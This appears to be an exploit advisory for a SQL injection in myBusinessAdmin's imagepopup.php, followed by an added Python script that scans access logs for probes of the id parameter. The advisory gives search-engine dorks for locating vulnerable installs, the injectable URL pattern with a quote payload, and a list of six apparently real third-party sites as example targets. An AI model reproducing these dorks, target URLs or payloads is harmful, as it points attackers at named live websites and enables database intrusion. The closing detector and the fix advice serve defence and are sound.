myBusinessAdmin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
61199fcdd72948288b6ed131c61a7639d0420c74ff9601b8ff95b0b0efc14215
#Exploit Title : myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability
#Author : DevilScreaM
#Date : 22/08/2013
#Category : Web Applications
#Vendor : http://mybusinessadmin.com/
#Product Link : http://www.redcow.ca/products/mybusinessadmin/
#Dork
intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc.
intext:Powered by myBusinessAdmin
inurl:imagepopup.php?Id=
#Vulnerability : SQL Injection Vulnerability
#Tested On : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id
SQL Injection Vulnerability
http://site-target/imagepopup.php?Id=[SQLI]
Example http://site-target/imagepopup.php?id=68556'
==========================================================================
Example Site
http://www.yorksunburymuseum.com/imagepopup.php?id=68556'
http://www.carletonhockey.ca/imagepopup.php?id=89370'
http://www.kiraawards.ca/imagepopup.php?id=39851'
http://www.tcquilts.com/imagepopup.php?id=15141'
http://www.panb.ca/imagepopup.php?id=24455'
http://www.frederictonjunction.ca/imagepopup.php?id=89842'
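
For site operators, the request pattern above (a non-numeric value in the id parameter of imagepopup.php) can be searched for in web server access logs. The following is an added example, not part of the original advisory or the vendor's code; it assumes combined-format access logs, and the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def suspicious_id(target):
    """Return the offending value if the request hits imagepopup.php with a
    non-numeric id/Id parameter, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/imagepopup.php"):
        return None
    # parse_qsl percent-decodes, so %27 and a literal quote are treated alike.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "id" and not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, status, value) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request entry
        value = suspicious_id(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), int(m.group("status")), value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2013:10:00:01 +0000] "GET /imagepopup.php?id=68556 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Aug/2013:10:00:05 +0000] "GET /imagepopup.php?id=68556\' HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Aug/2013:10:00:09 +0000] "GET /imagepopup.php?Id=68556%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [22/Aug/2013:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

A flagged request only shows that the parameter was probed; the fix itself is to cast the id to an integer or bind it in a parameterized query inside imagepopup.php.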